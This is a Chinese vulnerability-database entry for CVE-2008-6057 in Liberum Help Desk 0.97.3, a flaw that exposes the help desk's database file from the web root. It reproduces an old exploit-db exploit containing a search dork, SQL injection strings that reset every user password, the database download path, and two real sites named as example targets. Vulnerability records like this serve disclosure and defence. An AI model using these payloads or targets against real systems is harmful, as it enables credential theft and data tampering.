liberum liberum_help_desk 权限许可和访问控制漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117062 漏洞类型 权限许可和访问控制
发布时间 2008-12-16 更新时间 2009-02-04
CVE编号 CVE-2008-6057 CNNVD-ID CNNVD-200902-076
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/7493
https://www.securityfocus.com/bid/84606
https://cxsecurity.com/issue/WLB-2009020115
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-076
|漏洞详情
DougLuxemLiberumHelpDesk0.97.3版本在web根目录下储存db/helpdesk2000.mdb而非赋予足够的访问控制,这使得远程攻击者可以借助一个直接请求,获得密码。
|漏洞EXP
Liberum Help Desk (SQL/DD) Multiple Remote Vulnerabilities

author : Cold z3ro, www.hackteach.org

Dork : "Liberum Help Desk, Copyright (C) 2001 Doug Luxem"

==============
[#] SQL Injection

http://www.site.com/[path]/forgotpass.asp

    In uid insert SQL command's =>

SCMD ==>    ' or '1=1
SCMD ==>    ' or 'update tblusers set password = "z3ro"


all passwords will be z3ro

=============
[#] Database Disclosure

http://www.site.com/[path]/db/helpdesk2000.mdb



example :
https://www.bauer.uh.edu/helpdesk/db/helpdesk2000.mdb
http://www.ags2.com/helpdesk/db/helpdesk2000.mdb

# milw0rm.com [2008-12-16]
|受影响的产品
Liberum Liberum Help Desk 0.97.3
|参考资料

来源:XF
名称:liberumhelpdesk-helpdesk2k-info-disclosure(47421)
链接:http://xforce.iss.net/xforce/xfdb/47421
来源:MILW0RM
名称:7493
链接:http://www.milw0rm.com/exploits/7493